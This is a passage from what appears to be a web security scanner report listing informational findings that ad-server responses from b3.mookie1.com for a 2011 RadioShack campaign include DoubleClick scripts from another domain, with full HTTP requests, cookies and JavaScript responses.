Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2676
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/20596
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2059620059/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2059620059?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.64. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=703327951?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.65. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:22:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.66. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/35152
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/351527733/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=351527733?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.67. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:51:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3180
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.68. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2676
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/15050
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1505043720/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1505043720?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.69. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3180
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/10626607/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=10626607?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.70. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268201

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.71. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1202403029?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.72. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:15:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567?">
\n');
